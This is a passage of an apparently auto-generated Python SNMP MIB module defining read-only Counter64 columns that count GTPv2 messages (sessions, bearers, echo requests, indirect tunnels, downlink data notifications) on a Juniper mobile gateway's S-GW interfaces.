if mibBuilder.loadTexts: jnxMbgSgwIfGTPUnknVerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGTPUnknVerRx.setDescription('Number of Unknown Version Packets Received.')
jnxMbgSgwIfPcktLenErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPcktLenErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPcktLenErrRx.setDescription('Number of Packet Length Error Packets Received.')
jnxMbgSgwIfUnknMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUnknMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUnknMsgRx.setDescription('Number of Unknown Messages Received.')
jnxMbgSgwIfProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfProtocolErrRx.setDescription('Number of GTPv2 Protocol Errors Received.')
jnxMbgSgwIfUnSupportedMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUnSupportedMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUnSupportedMsgRx.setDescription('Number of GTPv2 Unsupported Messages received.')
jnxMbgSgwIfT3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfT3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfT3RespTmrExpRx.setDescription('Number of GTP V2 T3 timer expiries Received.')
jnxMbgSgwIfV2NumMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgRx.setDescription('Number of GTPv2 messages received.')
jnxMbgSgwIfV2NumMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgTx.setDescription('Number of V2 messages sent.')
jnxMbgSgwIfV2NumBytesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 17), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesRx.setDescription('Number of GTPv2 bytes received.')
jnxMbgSgwIfV2NumBytesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 18), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesTx.setDescription('Number of V2 bytes sent.')
jnxMbgSgwIfV2EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 19), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqRx.setDescription('Number of GTP V2 Echo Request received.')
jnxMbgSgwIfV2EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 20), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqTx.setDescription('Number of GTP V2 Echo Request Sent.')
jnxMbgSgwIfV2EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespRx.setDescription('Number of GTP V2 Echo Response received.')
jnxMbgSgwIfV2EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespTx.setDescription('Number of GTP V2 Echo Response Sent.')
jnxMbgSgwIfV2VerNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupRx.setDescription('Number of GTP V2 Version Not supported messages received')
jnxMbgSgwIfV2VerNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupTx.setDescription('Number of GTP V2 version not supported messages sent.')
jnxMbgSgwIfCreateSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqRx.setDescription('Number of GTP V2 Create Session Requests received.')
jnxMbgSgwIfCreateSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqTx.setDescription('Number of GTP V2 Create Session Requests Sent.')
jnxMbgSgwIfCreateSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 27), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspRx.setDescription('Number of GTP V2 Create Session Responses received.')
jnxMbgSgwIfCreateSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspTx.setDescription('Number of GTP V2 Create Session Responses Sent.')
jnxMbgSgwIfModBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqRx.setDescription('Number of GTP V2 Modify Bearer Requests received.')
jnxMbgSgwIfModBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqTx.setDescription('Number of GTP V2 Modify Bearer Requests Sent.')
jnxMbgSgwIfModBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspRx.setDescription('Number of GTP V2 Modify Bearer Responses received.')
jnxMbgSgwIfModBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspTx.setDescription('Number of GTP V2 Modify Bearer Responses Sent.')
jnxMbgSgwIfDelSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqRx.setDescription('Number of GTP V2 Delete Session Requests received.')
jnxMbgSgwIfDelSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqTx.setDescription('Number of GTP V2 Delete Session Requests Sent.')
jnxMbgSgwIfDelSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspRx.setDescription('Number of GTP V2 Delete Session Responses received.')
jnxMbgSgwIfDelSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspTx.setDescription('Number of GTP V2 Delete Session Responses Sent.')
jnxMbgSgwIfCrtBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 37), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqRx.setDescription('Number of GTP V2 Create Bearer Requests received.')
jnxMbgSgwIfCrtBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 38), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqTx.setDescription('Number of GTP V2 Create Bearer Requests Sent.')
jnxMbgSgwIfCrtBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 39), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspRx.setDescription('Number of GTP V2 Create Bearer Response received.')
jnxMbgSgwIfCrtBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 40), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspTx.setDescription('Number of GTP V2 Create Bearer Response Sent.')
jnxMbgSgwIfUpdBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 41), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqRx.setDescription('Number of GTP V2 Update Bearer Request received.')
jnxMbgSgwIfUpdBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 42), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqTx.setDescription('Number of GTP V2 Update Bearer Request Sent.')
jnxMbgSgwIfUpdBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 43), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspRx.setDescription('Number of GTP V2 Update Bearer Response received.')
jnxMbgSgwIfUpdBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 44), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspTx.setDescription('Number of GTP V2 Update Bearer Response Sent.')
jnxMbgSgwIfDelBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 45), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqRx.setDescription('Number of GTP V2 Delete Bearer Request received.')
jnxMbgSgwIfDelBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 46), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqTx.setDescription('Number of GTP V2 Delete Bearer Request Sent.')
jnxMbgSgwIfDelBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 47), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspRx.setDescription('Number of GTP V2 Delete Bearer Response received.')
jnxMbgSgwIfDelBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 48), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspTx.setDescription('Number of GTP V2 Delete Bearer Response Sent.')
jnxMbgSgwIfDelConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 49), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqRx.setDescription('Number of GTP V2 Delete PDN connection set Request received.')
jnxMbgSgwIfDelConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 50), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqTx.setDescription('Number of GTP V2 Delete PDN connection set Request Sent.')
jnxMbgSgwIfDelConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 51), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspRx.setDescription('Number of GTP V2 Delete PDN connection set Response received.')
jnxMbgSgwIfDelConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 52), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspTx.setDescription('Number of GTP V2 Delete PDN connection set Response Sent.')
jnxMbgSgwIfUpdConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 53), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqRx.setDescription('Number of GTP V2 Update Connection set Request received.')
jnxMbgSgwIfUpdConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 54), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqTx.setDescription('Number of GTP V2 Update Connection set Request Sent.')
jnxMbgSgwIfUpdConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 55), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspRx.setDescription('Number of GTP V2 Update Connection set Response received.')
jnxMbgSgwIfUpdConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 56), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspTx.setDescription('Number of GTP V2 Update Connection set Response Sent.')
jnxMbgSgwIfModBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 57), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdRx.setDescription('Number of GTP V2 Modify Bearer Command received.')
jnxMbgSgwIfModBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 58), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdTx.setDescription('Number of GTP V2 Modify Bearer Command Sent.')
jnxMbgSgwIfModBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 59), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndRx.setDescription('Number of GTP V2 Modify Bearer Failure received.')
jnxMbgSgwIfModBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 60), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndTx.setDescription('Number of GTP V2 Modify Bearer Failure Sent.')
jnxMbgSgwIfDelBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 61), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdRx.setDescription('Number of GTP V2 Delete Bearer Command received.')
jnxMbgSgwIfDelBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 62), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdTx.setDescription('Number of GTP V2 Delete Bearer Command Sent.')
jnxMbgSgwIfDelBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 63), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndRx.setDescription('Number of GTP V2 Delete Bearer Failure received.')
jnxMbgSgwIfDelBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 64), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndTx.setDescription('Number of GTP V2 Delete Bearer Failure Sent.')
jnxMbgSgwIfBrResCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 65), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdRx.setDescription('Number of GTP V2 Bearer Response Command received.')
jnxMbgSgwIfBrResCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 66), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdTx.setDescription('Number of GTP V2 Bearer Response Command Sent.')
jnxMbgSgwIfBrResFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 67), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndRx.setDescription('Number of GTP V2 Bearer Resource Failure received.')
jnxMbgSgwIfBrResFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 68), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndTx.setDescription('Number of GTP V2 Bearer Resource Failure Sent.')
jnxMbgSgwIfRelAcsBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 69), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqRx.setDescription('Number of GTP V2 Release Access Bearer Requests received.')
jnxMbgSgwIfRelAcsBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 70), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqTx.setDescription('Number of GTP V2 Release Access Bearer Requests sent.')
jnxMbgSgwIfRelAcsBrRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 71), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespRx.setDescription('Number of GTP V2 Release Access Bearer Response received.')
jnxMbgSgwIfRelAcsBrRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 72), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespTx.setDescription('Number of GTP V2 Release Access Bearer Response sent.')
jnxMbgSgwIfCrIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 73), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request Received')
jnxMbgSgwIfCrIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 74), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request sent')
jnxMbgSgwIfCrIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 75), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response Received')
jnxMbgSgwIfCrIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 76), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response sent')
jnxMbgSgwIfDelIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 77), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request Received')
jnxMbgSgwIfDelIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 78), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request sent.')
jnxMbgSgwIfDelIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 79), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response Received')
jnxMbgSgwIfDelIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 80), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response sent.')
jnxMbgSgwIfDlDataNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 81), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifRx.setDescription('Number of GTP V2 Downlink Data Notify received.')
jnxMbgSgwIfDlDataNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 82), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifTx.setDescription('Number of GTP V2 Downlink Data Notify Sent.')
jnxMbgSgwIfDlDataAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 83), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckRx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement received.')
jnxMbgSgwIfDlDataAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 84), Counter64()).setMaxAccess("readonly")
